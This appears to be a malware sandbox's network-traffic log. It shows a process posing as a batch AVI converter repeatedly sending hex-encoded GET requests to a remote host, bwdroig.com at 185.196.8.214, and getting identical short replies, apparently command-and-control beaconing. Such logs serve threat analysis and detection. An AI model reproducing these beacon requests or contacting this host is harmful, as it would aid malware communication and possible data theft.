                                                            Sep 11, 2024 21:06:06.300848007 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:07.015593052 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.5 | 49706 | 185.196.8.214 | 80 | |
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:07.145529032 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:07.862838984 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.5 | 49708 | 185.196.8.214 | 80 | |
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:07.992779016 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:08.685074091 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:08.796487093 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:09.037638903 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.5 | 49710 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:09.161799908 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:09.851246119 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.5 | 49711 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:09.978030920 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:11.069535017 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.5 | 49712 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:11.199140072 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:11.896188974 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.5 | 49713 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:12.030303955 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:12.773536921 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.5 | 49714 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:12.895684004 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:13.605597019 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.5 | 49715 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 11, 2024 21:06:13.757467031 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:14.458170891 CEST | 220 | IN | HTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49716 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:14.584191084 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:15.308001995 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:15.422348976 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:15.657740116 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49717 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:15.808743954 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:16.511200905 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:16.623903990 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:16.890240908 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:16.998512030 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:17.260364056 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49718 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:17.381763935 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:18.082767963 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49719 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:18.215065002 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:18.905867100 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:18 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49720 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:19.036345959 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:19.748555899 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:19.858717918 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:20.096484900 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49721 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:20.226300955 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:20.935949087 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:21.045954943 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:21.296415091 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49722 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:21.430515051 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:22.197506905 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49723 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:22.316538095 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:22.998537064 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:23.109916925 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:23.356381893 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:23.469322920 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:23.709589958 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49724 | 185.196.8.214 | 80 | 3220 | C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 21:06:23.859535933 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 11, 2024 21:06:24.545241117 CEST | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Wed, 11 Sep 2024 19:06:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Sep 11, 2024 21:06:24.655040979 CEST | 318 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
    Host: bwdroig.com
